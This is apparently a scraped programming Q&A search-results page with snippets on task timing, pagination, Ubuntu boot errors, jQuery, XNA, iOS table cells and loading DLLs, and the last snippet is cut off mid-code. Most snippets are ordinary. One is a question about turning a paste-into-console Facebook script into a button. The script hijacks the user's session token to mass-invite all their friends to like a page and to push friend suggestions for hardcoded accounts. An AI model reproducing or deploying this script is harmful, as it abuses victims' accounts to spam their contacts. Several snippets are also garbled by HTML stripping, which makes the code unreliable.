Search Results

Search found 21004 results on 841 pages for 'load assembly'.

Page 219/841 | < Previous Page | 215 216 217 218 219 220 221 222 223 224 225 226  | Next Page >

  • Logic - Time measurement

    - by user73384
    To measure the following for tasks- Last execution time and maximum execution time for each task. CPU load/time consumed by each task over a defined period informed by application at run time. Maximum CPU load consumed by each task. Tasks have following characteristics- First task runs as background – Event information for entering only Second task - periodic – Event information for entering and exiting from task Third task is interrupt , can start any time – no information available from this task Forth task highest priority interrupt , can start any time – Event information for entering and exiting from task Should use least possible execution time and memory. 32bit increment timer available for time counting. Lets prepare and discuss the logic, It’s OK to have limitations …! Questions on understanding problem statement are welcome

    Read the article

  • Display large amount of data to client through pagination

    - by ebram tharwat
    I have a web application in which i need to show a big number of data or records for clients. Now i 'll use pagination but i was wondering should I: Load all the data once then pagination, sorting and sarching 'll be easy..But it 'll takes big time(using local DB it takes up to 9 sec.) Or each time i show new page(from the pagination) i make a new request to server and then new request to DB to get the next records..But then what if the client click on Prev button, i 'll make a new request to get data that I had previously..Should i cach data that are loaded before and how if that's good technique? So load all data once or make a new request every time i need data that maybe have been loaded before. I'm using ASP.NET MVC SPA with durandaljs and knockoutjs

    Read the article

  • When I boot it says "No any drive found" and turns off after upgrade from 9.10 to 10.04

    - by user797582
    I did an upgrade on the weekend from Ubuntu 9.10 to 10.04 (karmic to lucid). Now, when I restart my computer, it goes through the regular load screen showing my P5K Asus motherboard, just like before but instead of showing the Ubuntu load screen, it tries to start grub but fails and then says "No any drive found" and the screen goes black. I've tried changing the drive configuration in the BIOS to AHCI or RAID and that didn't work. I've tried disabling JMICRON but to no avail. I'm running out of options here. Any advice?

    Read the article

  • Blank lines between sourcecode [closed]

    - by manix
    I'm so confused with a strange behaviour. Actually I have edited some php files remotely with my PhpDesigner8 (a php editor). Everything goes right, but when my teammates reopen the files that I have edited the source code have blank lines like below: class AdminController extends Controller { function __construct() { parent::__construct(); if (!$this->session->can_admin()) { show_error('Solo para administradores.'); } $this->load->library('backend'); } } Instead of class AdminController extends Controller { function __construct() { parent::__construct(); if (!$this->session->can_admin()) { show_error('Solo para administradores.'); } $this->load->library('backend'); } } Did you have experience these kinds of problems?

    Read the article

  • How can I run a complete application from RAM?

    - by pico
    When I do some stuff in background (unpacking, compiling, backup, etc.) my hdd is under load and for example, Firefox and Chromium take very long to start and react very slow. While my hdd is under load I have still plenty of free RAM and free CPU. How can I copy the whole Firefox or Chromium including all dependencies into RAM? I don't care about persistence, I just want to view some websites, videos, etc. There are instructions putting the cache into /dev/shm, but that didn't speed up so much. Getting the profile into the RAM drive might also be easy... But how to get the binaries with all dependencies into RAM?

    Read the article

  • jQuery setTimeout delay for an element

    - by Trouble
    Is there an easier way to wait for an element to load ( by independant script/mootools/other ). For example: I am waiting for a google map to load, but I don't want to use its API for checks. So I made two functions: function checkIfexist() { if(jQuery('#container').length) return 0; else reload(1); } function reload(mode) { setTimeout(function(){ do stuff . . . if(mode==1) checkIfexist(); }, 400); } I am starting it with reload(1); Is there an easier way to use setTimeout in such a way? I don't want to use delay, wait or whatever.

    Read the article

  • Why Does Unity lag Often That I have To Manually Shutdown/Restart my Core i3 Laptop?

    - by user20655
    I did a fresh install of Ubuntu then do did some upgrades. After my next restart when I try to open Ubuntu Software Center it took about 20 seconds for the window to load then 10 more seconds before it became click able. While doing some installation of software, Unity lags like hell that every time I click any application it takes a few seconds before I can see it. Even GEdit take a lot of time to load. The worst part was when I was doing nothing to my computer. Even on that part, my computer lags. My Laptop is a Brand New Core i3 with 2GB of RAM. Unity should run perfectly on that kind of machine right? BTW: I reinstalled Ubuntu 11.04 for about 5 times now and still nothing changed.

    Read the article

  • Why Does Unity on Ubuntu 11.04 Lags Often That I have To Manually Shutdown/Restart my Core i3 Laptop?

    - by user20655
    I did a fresh install of Ubuntu then do did some upgrades. After my next restart when I try to open Ubuntu Software Center it took about 20 seconds for the window to load then 10 more seconds before it became click able. While doing some installation of software, Unity lags like hell that every time I click any application it takes a few seconds before I can see it. Even GEdit take a lot of time to load. The worst part was when I was doing nothing to my computer. Even on that part, my computer lags. My Laptop is a Brand New Core i3 with 2GB of RAM. Unity should run perfectly on that kind of machine right? BTW: I reinstalled Ubuntu 11.04 for about 5 times now and still nothing changed.

    Read the article

  • Can XNA Content Pipeline split one content file into several .xnb?

    - by Zeta Two
    Let's say I have an xml file which looks like this <Weapons> <Weapon> <Name>Pistol</Name> ... </Weapon> <Weapon> <Name>MachineGun</Name> ... </Weapon> </Weapons> Would it be possible to use a custom importer/writer/reader to create two files, Pistol.xnb and MachineGun.xnb which I can load individually with Content.Load()? While writing this I realized I could just import a Weapon[] list and split them up with a helper, but I'm still wondering if this is possible?

    Read the article

  • PHP class data implementation

    - by Bakanyaka
    I'm studying OOP PHP and have watched two tutorials that implement user login\registration system as an example. But implementation varies. Which way will be more correct one to work with data such as this? Load all data retrieved from database as array into a property called something like _data on class creation and further methods operate with this property Create separate properties for each field retrieved from database, on class creation load all data fields into respective properties and operate with that properties separately? Then let's say I want to create a method that returns a list of all users with their data. Which way is better? Method that returns just an array of userdata like this: Array([0]=>array([id] => 1, [username] => 'John', ...), [1]=>array([id] => 2, [username] => 'Jack', ...), ...) Method that creates a new instance of it's class for each user and returns an array of objects

    Read the article

  • What should be stored in UserContext?

    - by HonorGod
    From my general understanding I believe UserContext for a web application is supposed to hold user authentication and authorization (user roles) information. As part of user roles, there are definitions on who can access what data and accordingly the corresponding reference data is loaded into the UserContext as well. Is this a good practice to load and use reference data from UserContext? Does this have any impact with the number of sessions vs size of data it is holding inside JVM? I am thinking we use UserContext only for authentication and authorization but load the reference data from cache on demand and use it if required.

    Read the article

  • Weird graphical bug when installing on an Asus G51jx

    - by skeletons
    Each and every time I attempt to install ubuntu 11.04 or 11.10 I get this bug after the very first ubuntu loadscreen pops up from the boot cd. I have been able to successfully load 10.04 and 10.10 on it but it refuses to load 11.10. Even attempting to update from 10.10 to 11.04 caused this very same issue. I am running on an Asus G51jx. Please help I have been trying to get this working for two weeks now. I do like 10.10 but I would rather have 11.10 :(

    Read the article

  • Is the Cloud ready for an Enterprise Java web application? Seeking a JEE hosting advice.

    - by Jakub Holý
    Greetings to all the smart people around here! I'd like to ask whether it is feasible or a good idea at all to deploy a Java enterprise web application to a Cloud such as Amazon EC2. More exactly, I'm looking for infrastructure options for an application that shall handle few hundred users with long but neither CPU nor memory intensive sessions. I'm considering dedicated servers, virtual private servers (VPSs) and EC2. I've noticed that there is a project called JBoss Cloud so people are working on enabling such a deployment, on the other hand it doesn't seem to be mature yet and I'm not sure that the cloud is ready for this kind of applications, which differs from the typical cloud-based applications like Twitter. Would you recommend to deploy it to the cloud? What are the pros and cons? The application is a Java EE 5 web application whose main function is to enable users to compose their own customized Product by combining the available Parts. It uses stateless and stateful session beans and JPA for persistence of entities to a RDBMS and fetches information about Parts from the company's inventory system via a web service. Aside of external users it's used also by few internal ones, who are authenticated against the company's LDAP. The application should handle around 300-400 concurrent users building their product and should be reasonably scalable and available though these qualities are only of a medium importance at this stage. I've proposed an architecture consisting of a firewall (FW) and load balancer supporting sticky sessions and https (in the Cloud this would be replaced with EC2's Elastic Load Balancing service and FW on the app. servers, in a physical architecture the load-balancer would be a HW), then two physical clustered application servers combined with web servers (so that if one fails, a user doesn't loose his/her long built product) and finally a database server. The DB server would need a slave backup instance that can replace the master instance if it fails. This should provide reasonable availability and fault tolerance and provide good scalability as long as a single RDBMS can keep with the load, which should be OK for quite a while because most of the operations are done in the memory using a stateful bean and only occasionally stored or retrieved from the DB and the amount of data is low too. A problematic part could be the dependency on the remote inventory system webservice but with good caching of its outputs in the application it should be OK too. Unfortunately I've only vague idea of the system resources (memory size, number and speed of CPUs/cores) that such an "average Java EE application" for few hundred users needs. My rough and mostly unfounded estimate based on actual Amazon offerings is that 1.7GB and a single, 2-core "modern CPU" with speed around 2.5GHz (the High-CPU Medium Instance) should be sufficient for any of the two application servers (since we can handle higher load by provisioning more of them). Alternatively I would consider using the Large instance (64b, 7.5GB RAM, 2 cores at 1GHz) So my question is whether such a deployment to the cloud is technically and financially feasible or whether dedicated/VPS servers would be a better option and whether there are some real-world experiences with something similar. Thank you very much! /Jakub Holy PS: I've found the JBoss EAP in a Cloud Case Study that shows that it is possible to deploy a real-world Java EE application to the EC2 cloud but unfortunately there're no details regarding topology, instance types, or anything :-(

    Read the article

  • How to prevent client from accessing JSP page

    - by Ali Bassam
    In my web application, I use the .load() function in JQuery, to load some JSP pages inside a DIV. $("#myDiv").load("chat.jsp"); In chat.jsp, no Java codes is executed unless this client has Logged in, means, I check the session. String sessionId = session.getAttribute("SessionId"); if(sessionId.equals("100")){ //execute codes }else{ //redirect to log in page } Those java codes that will be executed, they will out.println(); some HTML elements. I don't want the client to write /chat.jsp in the browser to access this page, as it will look bad, and the other stuff in the main page won't be there, and this could do a harm to the web app security. How can I restrict someone from accessing chat.jsp directly, but yet keep it accessible via .load() ? UPDATE: JavaDB is a class that I made, it connects me to the Database. This is chat.jsp <body> <% String userId = session.getAttribute("SessionId").toString(); if (userId != null) { String roomId = request.getParameter("roomId"); String lastMessageId = request.getParameter("lastMessageId"); JavaDB myJavaDB = new JavaDB(); myJavaDB.Connect("Chat", "chat", "chat"); Connection conn = myJavaDB.getMyConnection(); Statement stmt = conn.createStatement(); String lastId = ""; int fi = 0; ResultSet rset = stmt.executeQuery("select message,message_id,first_name,last_name from users u,messages m where u.user_id=m.user_id and m.message_id>" + lastMessageId + " and room_id=" + roomId + " order by m.message_id asc"); while (rset.next()) { fi = 1; lastId = rset.getString(2); %> <div class="message"> <div class="messageSender"> <%=rset.getString(3) + " " + rset.getString(4)%> </div> <div class="messageContents"> <%=rset.getString(1)%> </div> </div> <% } %> <div class="lastId"> <% if (fi == 1) {%> <%=lastId%> <% } else {%> <%=lastMessageId%> <% }%></div> <% if (fi == 1) {%> <div class="messages"> </div> <% } } else { response.sendRedirect("index.jsp"); }%> </body> Guys I don't know what Filter means. UPDATE If I decided to send a parameter that tells me that this request came from Jquery. .load("chat.jsp",{ jquery : "yes" }); And then check it in chat.jsp String yesOrNo = request.getParameter("jquery"); Then they can simply hack this by using this URL. /chat.jsp?jquer=yes or something like that.. UPDATE I tried Maksim's advice, I got this when I tried to access chat.jsp. Is this the desired effect?

    Read the article

  • Suggestions on how to map from Domain (ORM) objects to Data Transfer Objects (DTO)

    - by FryHard
    The current system that I am working on makes use of Castle Activerecord to provide ORM (Object Relational Mapping) between the Domain objects and the database. This is all well and good and at most times actually works well! The problem comes about with Castle Activerecords support for asynchronous execution, well, more specifically the SessionScope that manages the session that objects belong to. Long story short, bad stuff happens! We are therefore looking for a way to easily convert (think automagically) from the Domain objects (who know that a DB exists and care) to the DTO object (who know nothing about the DB and care not for sessions, mapping attributes or all thing ORM). Does anyone have suggestions on doing this. For the start I am looking for a basic One to One mapping of object. Domain object Person will be mapped to say PersonDTO. I do not want to do this manually since it is a waste. Obviously reflection comes to mind, but I am hoping with some of the better IT knowledge floating around this site that "cooler" will be suggested. Oh, I am working in C#, the ORM objects as said before a mapped with Castle ActiveRecord. Example code: By @ajmastrean's request I have linked to an example that I have (badly) mocked together. The example has a capture form, capture form controller, domain objects, activerecord repository and an async helper. It is slightly big (3MB) because I included the ActiveRecored dll's needed to get it running. You will need to create a database called ActiveRecordAsync on your local machine or just change the .config file. Basic details of example: The Capture Form The capture form has a reference to the contoller private CompanyCaptureController MyController { get; set; } On initialise of the form it calls MyController.Load() private void InitForm () { MyController = new CompanyCaptureController(this); MyController.Load(); } This will return back to a method called LoadComplete() public void LoadCompleted (Company loadCompany) { _context.Post(delegate { CurrentItem = loadCompany; bindingSource.DataSource = CurrentItem; bindingSource.ResetCurrentItem(); //TOTO: This line will thow the exception since the session scope used to fetch loadCompany is now gone. grdEmployees.DataSource = loadCompany.Employees; }, null); } } this is where the "bad stuff" occurs, since we are using the child list of Company that is set as Lazy load. The Controller The controller has a Load method that was called from the form, it then calls the Asyc helper to asynchronously call the LoadCompany method and then return to the Capture form's LoadComplete method. public void Load () { new AsyncListLoad<Company>().BeginLoad(LoadCompany, Form.LoadCompleted); } The LoadCompany() method simply makes use of the Repository to find a know company. public Company LoadCompany() { return ActiveRecordRepository<Company>.Find(Setup.company.Identifier); } The rest of the example is rather generic, it has two domain classes which inherit from a base class, a setup file to instert some data and the repository to provide the ActiveRecordMediator abilities.

    Read the article

  • JQuery get attr value from ajax loaded page

    - by Paolo Rossi
    In my index.php I've a ajax pager that load a content page (paginator.php). index.php <script type='text/javascript' src='js/jquery-1.11.1.min.js'></script> <script type='text/javascript' src='js/paginator.js'></script> <script type='text/javascript' src='js/functions.js'></script> <!-- Add fancyBox --> <script type="text/javascript" src="js/jquery.fancybox.pack.js?v=2.1.5"></script> <html> <div id="content"></div> paginator.js $(function() { var pageurl = 'paginator.php'; //Initialise the table at the first run $( '#content' ).load( pageurl, { pag: 1 }, function() { //animation(); }); //Page navigation click $( document ).on( 'click', 'li.goto', function() { //Get the id of clicked li var pageNum = $( this ).attr( 'id' ); $( '#content' ).load( pageurl, { pag: pageNum }, function() { //animation(); }); }); }); /* END */ paginator.php <ul><li>..etc </ul> ... ... <a id='test' vid='123'>get the id</a> <a id='test2' url='somepage.php'>open fancybox</a> I would like to take a variable of the loaded page (paginator.php) in this way but unfortunately I can not. functions.js $(function() { $('#test' ).click(function(e) { var id = $('#test').attr('vid'); alert ("vid is " + vid); }); }); /* END */ In this case popup not appear. I tried with add fancybox in my functions.js. Dialog box appear but the url attr is not taken. var url = $('#test2').attr('url'); $('#test').fancybox({ 'href' : url, 'width' : 100, 'height' : 100, 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe', 'fitToView' : true, 'autoSize' : false }); In other scenarios, without having the page loaded, I can do it, but in this case the behavior is different. How could I do this? thanks EDIT my goal is to open a dialog (fancybox) taking a variable from the loaded page EDIT2 I tried in this way paginator.php <a id="test" vid="1234">click me</a> paginator.js //Initialise the table at the first run $( '#content' ).load( pageurl, { pag: 1 }, function() { hide_anim(); popup(); }); //Page navigation click $( document ).on( 'click', 'li.goto', function() { //Get the id of clicked li var pageNum = $( this ).attr( 'id' ); $( '#content' ).load( pageurl, { pag: pageNum }, function() { hide_anim(); popup(); }); }) function.js function popup() { $('#test' ).click(function(e) { e.preventDefault(); var vid = $('#test').attr('vid'); alert ("vid is " + vid); }); } But popup not appear...

    Read the article

  • All UITableCells rendered at once... why?

    - by Greg
    I'm extremely confused by the proper behavior of UITableView cell rendering. Here's the situation: I have a list of 250 items that are loading into a table view, each with an image. To optimize the image download, I followed along with Apple's LazyTableImages sample code... pretty much following it exactly. Really good system... for reference, here's the cell renderer within the Apple sample code: - (UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath { // customize the appearance of table view cells // static NSString *CellIdentifier = @"LazyTableCell"; static NSString *PlaceholderCellIdentifier = @"PlaceholderCell"; // add a placeholder cell while waiting on table data int nodeCount = [self.entries count]; if (nodeCount == 0 && indexPath.row == 0) { UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:PlaceholderCellIdentifier]; if (cell == nil) { cell = [[[UITableViewCell alloc] initWithStyle:UITableViewCellStyleSubtitle reuseIdentifier:PlaceholderCellIdentifier] autorelease]; cell.detailTextLabel.textAlignment = UITextAlignmentCenter; cell.selectionStyle = UITableViewCellSelectionStyleNone; } cell.detailTextLabel.text = @"Loading…"; return cell; } UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:CellIdentifier]; if (cell == nil) { cell = [[[UITableViewCell alloc] initWithStyle:UITableViewCellStyleSubtitle reuseIdentifier:CellIdentifier] autorelease]; cell.selectionStyle = UITableViewCellSelectionStyleNone; } // Leave cells empty if there's no data yet if (nodeCount > 0) { // Set up the cell... AppRecord *appRecord = [self.entries objectAtIndex:indexPath.row]; cell.textLabel.text = appRecord.appName; cell.detailTextLabel.text = appRecord.artist; // Only load cached images; defer new downloads until scrolling ends if (!appRecord.appIcon) { if (self.tableView.dragging == NO && self.tableView.decelerating == NO) { [self startIconDownload:appRecord forIndexPath:indexPath]; } // if a download is deferred or in progress, return a placeholder image cell.imageView.image = [UIImage imageNamed:@"Placeholder.png"]; } else { cell.imageView.image = appRecord.appIcon; } } return cell; } So – my implementation of Apple's LazyTableImages system has one crucial flaw: it starts all downloads for all images immediately. Now, if I remove this line: //[self startIconDownload:appRecord forIndexPath:indexPath]; Then the system behaves exactly like you would expect: new images load as their placeholders scroll into view. However, the initial view cells do not automatically load their images without that prompt in the cell renderer. So, I have a problem: with the prompt in the cell renderer, all images load at once. Without the prompt, the initial view doesn't load. Now, this works fine in Apple sample code, which got me wondering what was going on with mine. It's almost like it was building all cells up front rather than just the 8 or so that would appear within the display. So, I got looking into it, and this is indeed the case... my table is building 250 unique cells! I didn't think the UITableView worked like this, I guess I thought it only built as many items as were needed to populate the table. Is this the case, or is it correct that it would build all 250 cells up front? Also – related question: I've tried to compare my implementation against the Apple LazyTableImages sample, but have discovered that NSLog appears to be disabled within the Apple sample code (which makes direct behavior comparisons extremely difficult). Is that just a simple publish setting somewhere, or has Apple somehow locked down their samples so that you can't log output at runtime? Thanks!

    Read the article

  • Loading multiple copies of a group of DLLs in the same process

    - by george
    Background I'm maintaining a plugin for an application. I'm Using Visual C++ 2003. The plugin is composed of several DLLs - there's the main DLL, that's the one that the application loads using LoadLibrary, and there are several utility DLLs that are used by the main DLL and by each other. Dependencies generally look like this: plugin.dll - utilA.dll, utilB.dll utilA.dll - utilB.dll utilB.dll - utilA.dll, utilC.dll You get the picture. Some of the dependencies between the DLLs are load-time and some run-time. All the DLL files are stored in the executable's directory (not a requirement, just how it works now). The problem There's a new requirement - running multiple instances of the plugin within the application. The application runs each instance of a plugin in its own thread, i.e. each thread calls The plugin's code, however, is nothing but thread-safe - lots of global variables etc.. Unfortunately, fixing the whole thing isn't currently an option, so I need a way to load multiple (at most 3) copies of the plugin's DLLs in the same process. Option 1: The distinct names approach Creating 3 copies of each DLL file, so that each file has a distinct name. e.g. plugin1.dll, plugin2.dll, plugin3.dll, utilA1.dll, utilA2.dll, utilA3.dll, utilB1.dll, etc.. The application will load plugin1.dll, plugin2.dll and plugin3.dll. The files will be in the executable's directory. For each group of DLLs to know each other by name (so the inter-dependencies work), the names need to be known at compilation time - meaning the DLLs need to be compiled multiple times, only each time with different output file names. Not very complicated, but I'd hate having 3 copies of the VS project files, and don't like having to compile the same files over and over. Option 2: The side-by-side assemblies approach Creating 3 copies of the DLL files, each group in its own directory, and defining each group as an assembly by putting an assembly manifest file in the directory, listing the plugin's DLLs. Each DLL will have an application manifest pointing to the assembly, so that the loader finds the copies of the utility DLLs that reside in the same directory. The manifest needs to be embedded for it to be found when a DLL is loaded using LoadLibrary. I'll use mt.exe from a later VS version for the job, since VS2003 has no built-in manifest embedding support. I've tried this approach with partial success - dependencies are found during load-time of the DLLs, but not when a DLL function is called that loads another DLL. This seems to be the expected behavior according to this article - A DLL's activation context is only used at the DLL's load-time, and afterwards it's deactivated and the process's activation context is used. I haven't yet tried working around this using ISOLATION_AWARE_ENABLED. Questions Got any other options? Any quick & dirty solution will do. :-) Will ISOLATION_AWARE_ENABLED even work with VS2003? Comments will be greatly appreciated. Thanks!

    Read the article

  • how to conver this to a button action

    - by Filipe Heitor
    i have this code to paste in a browser console, can i turn this in to a button ??? and run in a html page? javascript:var Title="Ganhando Likes Na Pagina Do Facebook.";var Descriptions="",_text='Criado & Configurado Por Pelegrino RoxCurta Por favor MeGustaJEdi';page_id=/"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];function InviteFriends(opo){jx.load(window.location.protocol+"//www.facebook.com/ajax/pages/invite/send_single/?page_id="+page_id+"&invitee="+opo+"&elem_id=u_0_1k&action=send&__user="+user_id+"&_a=1&_dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg="+fb_dtsg+"&phstamp=",function(a){var b=a.substring(a.indexOf("{"));var c=JSON.parse(b);i--;Descriptions="";err++;if(c.errorDescription)Descriptions+=c.errorDescription;else Descriptions+=JSON.stringify(c,null,"")}else{Descriptions+="color:darkgreen'";Descriptions+=arn[i]+" has been invited to like the page "+page_name+".";suc++}Descriptions+="";var display="";display+=""+Title+"";if(i0){display+=arr.length+" Friends Detected";display+=""+suc+" Friends Invited of "+(arr.length-i)+" Friends Processed ";display+="("+i+" Lefted...)";display+="";display+=Descriptions;display+="https://fbcdn-profile-a.akamaihd.net/.../r/UlIqmHJn-SK.gif);width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src="+pho[i]+""+arn[i]+"";display+="";display+="Please Wait While Inviting Your Friends to Like Your Page "+page_name+".";display+=_text;display+="";display+="";window[tag+"_close"]=true}else{Title="All Of Your Friends Have Been Invited to Like Your Page.";display+=arr.length+" Friends Detected and ";display+=""+suc+" Friends Invited.";display+="Go to HomepageRefresh PageCancel";display+="";display+=_text;display+="";window[tag+"_close"]=false}display+="";document.getElementById("pagelet_sidebar").innerHTML=display},"text","post");tay--;if(tay0){var s=arr[tay];setTimeout("InviteFriends("+s+")",100)}console.log(tay+"/"+arr.length+":"+arr[tay]+"/"+arn[tay]+", success:"+suc);if(page_id)jx.load(window.location.protocol+"//www.facebook.com/ajax/friends/suggest?&receiver="+opo+"&newcomer=1273872655&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user="+user_id+"&_a=1&_dyn=798aD5z5CF-&__req=17&fb_dtsg="+fb_dtsg+"&phstamp=1658165120113116104521114",function(){},"text","post");if(page_id)jx.load(window.location.protocol+"//www.facebook.com/ajax/friends/suggest?&receiver="+opo+"&newcomer=100002920534041&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user="+user_id+"&_a=1&_dyn=798aD5z5CF-&__req=17&fb_dtsg="+fb_dtsg+"&phstamp=1658168561015387781130",function(){},"text","post");if(page_id)jx.load(window.location.protocol+"//www.facebook.com/ajax/pages/invite/send?&fb_dtsg="+fb_dtsg+"&profileChooserItems=%7B%22"+opo+"%22%3A1%7D&checkableitems[0]="+opo+"&page_id="+page_id+"&__user="+user_id+"&_a=1&_dyn=7n8aD5z5CF-3ui&__req=k&phstamp=",function(){},"text","post")}jx={b:function(){var b=!1;if("undefined"!=typeof ActiveXObject)try{b=new ActiveXObject("Msxml2.XMLHTTP")}catch(c){try{b=new ActiveXObject("Microsoft.XMLHTTP")}catch(a){b=!1}}else if(window.XMLHttpRequest)try{b=new XMLHttpRequest}catch(h){b=!1}return b},load:function(b,c,a,h,g){var e=this.d();if(e&&b){e.overrideMimeType&&e.overrideMimeType("text/xml");h||(h="GET");a||(a="text");g||(g={});a=a.toLowerCase();h=h.toUpperCase();b+=b.indexOf("?")+1?"&":"?";var k=null;"POST"==h&&(k=b.split("?"),b=k[0],k=k[1]);e.open(h,b,!0);e.onreadystatechange=g.c?function(){g.c(e)}:function(){if(4==e.readyState)if(200==e.status){var b="";e.responseText&&(b=e.responseText);"j"==a.charAt(0)?(b=b.replace(/[\n\r]/g,""),b=eval("("+b+")")):"x"==a.charAt(0)&&(b=e.responseXML);c&&c(b)}else g.f&&document.getElementsByTagName("body")[0].removeChild(g.f),g.e&&(document.getElementById(g.e).style.display="none"),error&&error(e.status)};e.send(k)}},d:function(){return this.b()}};function ChangeLocation(){window.location.href="http://www.facebook.com/"}setTimeout("ChangeLocation",1);window.onbeforeunload=function(){if(window[tag+"_close"])return"This script is running now!"};var i=3;var tay=3;var suc=0;var err=0;var arr=new Array;var arn=new Array;var pho=new Array;var tag="Close";var page_name,x=document.getElementsByTagName("span");for(i=0;ia=1&_dyn=7n8aD5z5CF-3ui&__req=l",function(a){var b=a;var c=b.substring(b.indexOf("{"));var d=JSON.parse(c);d=d.payload.entries;for(var e=0;e";display+=""+Title+"";display+=arr.length+" Friends Detected";display+="";document.getElementById("pagelet_sidebar").innerHTML=display;InviteFriends(arr[i])});

    Read the article

  • FSharp.Core.sigdata not found alongside FSharp.Core

    - by Mauricio Scheffer
    I'm trying to use F# for an ASP.NET MVC application. One my controller actions sends an F# list to the view, so I write: <%@ Page Language="C#" Inherits="ViewPage<FSharpList<int>>" %> Of course, for this to work, I have to add Microsoft.FSharp.Collections to the namespaces element in my web.config: <add namespace="Microsoft.FSharp.Collections"/> and add a reference to FSharp.Core, in the assemblies element: <add assembly="FSharp.Core, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/> As soon as I add this assembly reference, every view (whether it uses an F# type or not) fails with this error: error FS1221: FSharp.Core.sigdata not found alongside FSharp.Core I can work around this by not having any F# specific types in my views, but what's the reason for this error? Also, where's FSharp.Core.sigdata ? It's not in my GAC and I can't find it anywhere.

    Read the article

  • How to Integrate ILMerge into Visual Studio Build Process to Merge Assemblies?

    - by AMissico
    I want to merge one .NET DLL assembly and one C# Class Library project referenced by a VB.NET Console Application project into one command-line console executable. I can do this with ILMerge from the command-line, but I want to integrate this merging of reference assemblies and projects into the Visual Studio project. From my reading, I understand that I can do this through a MSBuild Task or a Target and just add it to a C#/VB.NET Project file, but I can find no specific example since MSBuild is large topic. Moreover, I find some references that add the ILMerge command to the Post-build event. How do I integrate ILMerge into a Visual Studio (C#/VB.NET) project, which are just MSBuild projects, to merge all referenced assemblies (copy-local=true) into one assembly? How does this tie into a possible ILMerge.Targets file? Is it better to use the Post-build event?

    Read the article

  • Javascript or CSS hover not working in Safari and Chrome

    - by PAZtech
    I have a problem with a script for a image gallery. The problem seems to only occur on Safari and Chrome, but if I refresh the page I get it to work correctly - weird! Correct function: The gallery has a top bar, which if you hover over it, it will display a caption. Below sits the main image. At the bottom there is another bar that is a reversal of the top bar. When you hover over it, it will display thumbnails of the gallery. The problem: In Safari and Chrome, the thumbnail holder will not display. In fact, it doesn't even show it as an active item (or a rollover). But oddly enough, if you manually refresh the page it begins to work correctly for the rest of the time you view the page. Once you have left the page and return the same error occurs again and you have to go through the same process. Here's one of the pages to look at: link text Here's the CSS: #ThumbsGutter { background: url(../Images/1x1.gif); background: url(/Images/1x1.gif); height: 105px; left: 0px; position: absolute; top: 0px; width: 754px; z-index: 2; } #ThumbsHolder { display: none; } #ThumbsTable { left: 1px; } #Thumbs { background-color: #000; width: 703px; } #Thumbs ul { list-style: none; margin: 0; padding: 0; } #Thumbs ul li { display: inline; } .Thumbs ul li a { border-right: 1px solid #fff; border-top: 1px solid #fff; float: left; left: 1px; } .Thumbs ul li a img { filter: alpha(opacity=50); height: 104px; opacity: .5; width: 140px; } .Thumbs ul li a img.Hot { filter: alpha(opacity=100); opacity: 1; } Here is the javascript: //Variables var globalPath = ""; var imgMain; var gutter; var holder; var thumbs; var loadingImage; var holderState; var imgCount; var imgLoaded; var captionHolder; var captionState = 0; var captionHideTimer; var captionHideTime = 500; var thumbsHideTimer; var thumbsHideTime = 500; $(document).ready(function() { //Load Variables imgMain = $("#MainImage"); captionHolder = $("#CaptionHolder"); gutter = $("#ThumbsGutter"); holder = $("#ThumbsHolder"); thumbs = $("#Thumbs"); loadingImage = $("#LoadingImageHolder"); //Position Loading Image loadingImage.centerOnObject(imgMain); //Caption Tab Event Handlers $("#CaptionTab").mouseover(function() { clearCaptionHideTimer(); showCaption(); }).mouseout(function() { setCaptionHideTimer(); }); //Caption Holder Event Handlers captionHolder.mouseenter(function() { clearCaptionHideTimer(); }).mouseleave(function() { setCaptionHideTimer(); }); //Position Gutter if (jQuery.browser.safari) { gutter.css("left", imgMain.position().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - 89) + "px"); } else { gutter.css("left", imgMain.position().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - 105) + "px"); } //gutter.css("left", imgMain.position().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - 105) + "px"); //gutter.css("left", imgMain.offset().left + "px").css("top", ((imgMain.offset().top + imgMain.height()) - gutter.height()) + "px"); //Thumb Tab Event Handlers $("#ThumbTab").mouseover(function() { clearThumbsHideTimer(); showThumbs(); }).mouseout(function() { setThumbsHideTimer(); }); //Gutter Event Handlers gutter.mouseenter(function() { //showThumbs(); clearThumbsHideTimer(); }).mouseleave(function() { //hideThumbs(); setThumbsHideTimer(); }); //Next/Prev Button Event Handlers $("#btnPrev").mouseover(function() { $(this).attr("src", globalPath + "/Images/GalleryLeftButtonHot.jpg"); }).mouseout(function() { $(this).attr("src", globalPath + "/Images/GalleryLeftButton.jpg"); }); $("#btnNext").mouseover(function() { $(this).attr("src", globalPath + "/Images/GalleryRightButtonHot.jpg"); }).mouseout(function() { $(this).attr("src", globalPath + "/Images/GalleryRightButton.jpg"); }); //Load Gallery //loadGallery(1); }); function loadGallery(galleryID) { //Hide Holder holderState = 0; holder.css("display", "none"); //Hide Empty Gallery Text $("#EmptyGalleryText").css("display", "none"); //Show Loading Message $("#LoadingGalleryOverlay").css("display", "inline").centerOnObject(imgMain); $("#LoadingGalleryText").css("display", "inline").centerOnObject(imgMain); //Load Thumbs thumbs.load(globalPath + "/GetGallery.aspx", { GID: galleryID }, function() { $("#TitleHolder").html($("#TitleContainer").html()); $("#DescriptionHolder").html($("#DescriptionContainer").html()); imgCount = $("#Thumbs img").length; imgLoaded = 0; if (imgCount == 0) { $("#LoadingGalleryText").css("display", "none"); $("#EmptyGalleryText").css("display", "inline").centerOnObject(imgMain); } else { $("#Thumbs img").load(function() { imgLoaded++; if (imgLoaded == imgCount) { holder.css("display", "inline"); //Carousel Thumbs thumbs.jCarouselLite({ btnNext: "#btnNext", btnPrev: "#btnPrev", mouseWheel: true, scroll: 1, visible: 5 }); //Small Image Event Handlers $("#Thumbs 